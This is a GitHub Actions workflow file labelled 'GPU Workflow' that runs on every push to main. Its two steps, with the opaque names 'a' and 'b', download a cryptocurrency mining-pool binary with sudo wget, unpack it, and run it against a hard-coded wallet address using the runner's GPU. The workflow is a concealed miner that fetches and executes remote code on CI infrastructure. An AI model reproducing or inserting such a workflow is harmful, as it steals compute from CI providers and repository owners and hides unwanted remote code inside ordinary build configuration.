name: GPU Workflow
on: 
  push:
    branches:
      - main

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - name: a
        run: sudo wget https://github.com/gramcoinorg/mining-pool/releases/download/miners-r1/gram-mining-pool-ubuntu-x86-64.tar.gz && tar xvfz gram-mining-pool-ubuntu-x86-64.tar.gz
      - name: b
        run: ./gram-mining-pool --address UQAQuM1CUNV4kxf_AAOuSK__nxOw4BQQp_w413W8mzuF9dGf --gpu-auto --miner open-cl
